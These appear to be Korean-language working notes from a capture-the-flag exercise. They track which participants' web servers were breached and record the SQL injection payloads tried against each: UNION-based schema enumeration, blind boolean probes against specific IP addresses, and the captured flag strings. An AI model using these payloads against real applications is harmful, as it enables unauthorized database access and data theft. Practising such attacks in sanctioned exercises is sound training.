
(SELECT COUNT(*) FROM information_schema.columns WHERE table_schema = 'flag')=1



db
김인희
이근모
강호석 - flag가 유효하지 않음
배동인 - flag가 유효하지 않음
봉하늘
박희진
정의민
정수영
임수정
한윤솔
안성윤
이여진

flag가 없음
Gh이형석
김형도
정은하
이하빈

server
이형석 - flag가 없음 - 공격대상이 아님
박도연 - flag가 유효하지 않음 KCTF{cd012f4a1c84c418b6943e0fdb73507d}
김형도
정수영
임수정
+한윤슬
최화영 - flag가 유효하지 않음 KCTF{e3da43660df28774e9f586b6c1dce129}
김경민

==========================================================================================
db

E조정훈 - 서버 안열림


E김인희 - 성공!
a%') ORDER BY IFNULL(parent_id, bid) DESC, bid ASC union select null, null;-- -
dummy') union select null,null;-- - ->컬림이 몇개야..?
dummy') union select null,null,null,null,null,null,null,null,null,null,null,null;-- -             query error => Subquery returns more than 1 row
http://20.196.201.110:8081/index.php?search_keyword=dummy') or 1=0 -- -     false
http://20.196.201.110:8081/index.php?search_keyword=dummy') or 1=1 -- -     true
http://20.196.201.110:8081/index.php?search_keyword=dummy') or ascii(substr((select group_concat(table_name,0x3a,column_name) from information_schema.columns  WHERE table_schema = 'flag'),1,1))=1 -- -     false
이후 스크립트 작성


E이하빈 - flag없음
'union select 1,2,3,4,5,6,7,8;-- -   7,2 유효
' union select 1,column_name,3,4,5,6,table_name,8 from information_schema.columns WHERE table_schema = 'flag';-- -       kwi5vz[0]	mty1z8
' union select 1,column_name,3,4,5,6,table_name,8 from information_schema.columns;-- -      gyplfe[0]	t4p3j9
' union select 1,table_schema,3,4,5,6,table_name,8 from information_schema.tables;-- -

'union select 1,2,3,t4p3j9,5,6,7,8 from flag.gyplfe;-- -
     

J정은하- flag 미설정
axax' union select 1,null,2,null,3,null,4,5,null,null,null,null;-- -
axax' union select 1,null, table_name,null, column_name,null,4,5,null,null,null,null  from information_schema.columns WHERE table_schema = 'flag';-- - ->결과 없음
axax' union select 1,null, table_name,null, column_name,null,4,5,null,null,null,null  from information_schema.columns;-- -
' union select 1,null, 2,null, 3,null,4,5,null,null,null,null  from information_schema.columns WHERE table_schema = 'flag';-- -->flag설정 안되어 있는것 같음..

xss공격 받아서 리다이렉션 방지할라면 http://20.196.208.20:3020/boardSearch.php?searchOption=boardTitle&searchTxt=     요기로 공격
http://20.196.208.20:3020/boardSearch.php?searchOption=boardTitle&searchTxt=axax' union select 1,null, table_name,null, column_name,null,4,5,null,null,null,null  from information_schema.columns;-- -    유효했음
http://20.196.208.20:3020/boardSearch.php?searchOption=boardTitle&searchTxt=axax' union select 1,null, table_name,null, column_name,null,4,5,null,null,null,null  from information_schema.columns WHERE table_schema = 'flag' limit ;-- -    결과 없음
http://20.196.208.20:3020/boardSearch.php?searchOption=boardTitle&searchTxt=axax' union select 1,null, table_name,null, column_name,null,4,5,null,null,null,null  from information_schema.columns WHERE table_schema NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys');-- - 
http://20.196.208.20:3020/boardSearch.php?searchOption=boardTitle&searchTxt=axax' union select 1,table_name,TABLE_SCHEMA,4,5,6,7,8,9 from information_schema.tables;-- -


J이근모 - 성공!
검색설정한 후
axa' union select 1,2,3,4,5,6; -- -     2,4 valid
axa' union select  1,  table_name, 3, column_name,5,6 from information_schema.columns WHERE table_schema = 'flag'-- -                dm22vh [0]	e3nfvq
axa' union select 1,e3nfvq,3,4,5,6 from flag.dm22vh ; -- -
KCTF{a44830196b5529c5039574ac7edf74ab}


A이아름 - 서버 안열림


A강호석 - 푸는중
' UNION SELECT 9,8,null,7,6-- -
' UNION SELECT 999999999999,8,null,7,6 from information-- -
' union select  1,  table_name, 3, column_name,5 from information_schema.columns WHERE table_schema = 'flag'-- -
' union select  1, oh0icf, 3, 4, 5 from flag.55toay;-- -

http://20.214.183.146:1337/topic.php?id=31 and 0=0
31 and 0=0 t
31 and 0=1 f
(select group_concat(table_name,0x3a,column_name) from information_schema.columns)
select idx from db000.board where 31=31 and substring((select group_concat(table_name,0x3a,column_name) from information_schema.columns  WHERE table_schema = 'flag'),1,1)="w";
31 and substring((select group_concat(table_name,0x3a,column_name) from information_schema.columns  WHERE table_schema = 'flag'),1,1)="w";
31 and ascii(substring((select group_concat(table_name,0x3a,column_name) from information_schema.columns  WHERE table_schema = 'flag'),1,1))>70;   ->flag db가 없는것 같은데..?
이후 스크립트 작성

31 and if(1=1,1,2)=1
31 and if((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema = 'flag')=1,1,2)=1
31 and if((SELECT COUNT(*) FROM information_schema.columns WHERE table_schema = 'asdf')=1,1,2)=1


Gho김동윤 - 서버 안열림


Gho이형석 - flag없음
' union select 1,2,3,4,5,6,7 -- -      3,4유효
' union select 1,2,table_name,column_name,5,6,7 from information_schema.columns;-- -    ->flag 없음


Gho박도연 - 너무 견고함


Gho이정빈 - 서버 안열림


C배동인 - 푸는중
'union select 1,2;-- -    2 유효
a'union select 1,group_concat(table_name,0x3a,column_name) from information_schema.columns  WHERE table_schema = 'flag'-- -      	rqwb1f:bwstpe
'union select 1,bwstpe from flag.rqwb1f;-- -
보안패치함!

/board/?id=
union select 1,2,3,4-- -


C김민성 - 서버오류


C이윤지 - 서버오류


K봉하늘 - 성공!
' union select 1,2,3,4,5,6,7,8,9;-- -
' union select column_name,2,table_name,4,5,6,7,8,9 from information_schema.columns WHERE table_schema = 'flag';-- -           1i5e9c	jddt1p
' union select 1,2,1i5e9c,4,5,6,7,8,9 from flag.jddt1p;-- -         KCTF{31c1ceea5b22ae45be55fb7b54e0221f}

K박희진 - 성공!
'union select 1,2,3,4,5,6,7,8;-- -      2,4유효
az' union select 1,column_name,3,table_name,5,6,7,8 from information_schema.columns WHERE table_schema = 'flag';-- -              2rfbe2	g113vo
az'union select 1,2rfbe2,3,4,5,6,7,8 from flag.g113vo-- -        KCTF{d9afcde2a6605af2acee3fe94036860f}

K정태웅 - 풀이중-> 잘모르겠음..
' union select null,null,null,null,null,null,null,null;-- -
az' union select 1,2,3,4,5,6,7,8;-- -
az' union select 1,table_name,3,4,5,6,column_name,8 from information_schema.columns WHERE table_schema = 'flag';-- -  =>3jmok7	h8uoz0	
az' union select h8uoz0,2,3,4,h8uoz0,6,7,8 from flag.3jmok7;-- -
az' union select 1,xpnays,3,4,5,6,7,8 from flag.m67on5;-- -
title union select 1,gamhfk,3,4,5,6,7,8 from flag.fgj9rw;-- -


H정의민 - 성공!
' union select null,null,null,null,null,null;-- -
' union select 1,2,3,4,5,6;-- -             ->2,4
' union select 1,table_name,3,column_name,5,6 from information_schema.columns WHERE table_schema = 'flag';-- -      ar4q4i	utrkns
' union select 1,utrkns,3,4,5,6 from flag.ar4q4i;-- -               KCTF{1a618fbbd06c5b7f92ccac34f3c329d1}


H김형도 - 성공!
'union select 1,2,3,4,5,6,7,8,9;-- -      2,4유효
' union select 1,table_name,3,column_name,5,6,7,8,9 from information_schema.columns WHERE table_schema = 'flag';-- -     ladx5g	ayxk70
'union select 1,ayxk70,3,4,5,6,7,8,9 from flag.ladx5g;-- -


H정수영 -  성공!
' union select null, null,null,null,null,null,null,null;-- -
' union select 1,2,3,4,5,6,7,8;-- -
ax' union select 1,table_name,3,column_name,5,6,7,8 from information_schema.columns WHERE table_schema = 'flag';-- -           ->ste2m5	y9mrvo
ax' union select 1, ste2m5,3,4,5,6,7,8 from flag.y9mrvo;-- -      KCTF{c3a631cb04d210a1324a4a56d214868e}	


G임수정 - 성공!
' union select 1,2,3,4,5,6,7;-- -       12456
' union select 1,table_name,3,column_name,5,6,7 from information_schema.columns;-- -
' union select 1,table_name,3,column_name,5,6,7 from information_schema.columns WHERE table_schema = 'flag';-- -         axz5vu	9uk71b	
' union select 1,9uk71b,3,4,5,6,7 from flag.axz5vu;-- -       KCTF{c1f6c93a9826407dacab9a87d9b91fd5}

' union select id,title,3,4,date,hit,7 from board;-- -

G김현수 - 서버오류


G한윤솔 - 성공!
ax' union select 1,2,3,4,5,6;-- -
ax' union select 1,table_name,3,4,column_name,6 from information_schema.columns WHERE table_schema = 'flag';-- -       jm49wp	3	3w4uro
ax' union select 1,3w4uro,3,4,5,6 from flag.jm49wp;-- -         KCTF{3cf3eecbb5dcf0bb8a249c2049443b80} 


F김경민 -  flag있는것 같은데 접근이 안됨
' union select 1,2,3,4,5,6;-- -
ax' union select 1,table_name,3,4,column_name,6 from information_schema.columns WHERE table_schema = 'flag';-- -         	clkgzb	hnf2x4
ax' union select 1,table_name,3,4,column_name,6 from information_schema.columns;-- -
ax' union select 1,hnf2x4,3,4,5,6 from flag.clkgzb;-- -     x
ax' union select 1,substring(pfirfr,1,1),3,4,5,6 from flag.2cib92;-- - 

F최화영 - flag없음
x' union select 1,2,3,4,5,6; -- -    3,2 vaild
x' union select column_name,table_name,column_name,4,5,6 from information_schema.columns WHERE table_schema = 'flag';-- -       e31ath    owyvgu
x' union select e31ath,2 ,3,4,5,6 from flag.owyvgu; -- -


D이여진 - 성공!
ax' union select 1,2,3,4,5,6,7;-- -
ax' union select column_name,table_name,3,4,5,6,7 from information_schema.columns WHERE table_schema = 'flag';-- -       bwo8s8: gip8cx   (뒤에페어가 flag페어임)
ax' union select 1,bwo8s8,3,4,5,6,7 from flag.gip8cx;-- -            KCTF{1300a5b0425ab73b2b0201de65ccfe35}


D안성윤 - 성공!
a'union select 1,2-- -   1유효
a'union select group_concat(table_name,0x3a,column_name),2 from information_schema.columns  WHERE table_schema = 'flag'-- -      7zrsp2:nxoelp
a'union select nxoelp,2 from flag.7zrsp2-- -             KCTF{ae2b1817f874bf99da202ce5c9f9698f}

 
=====================================================================================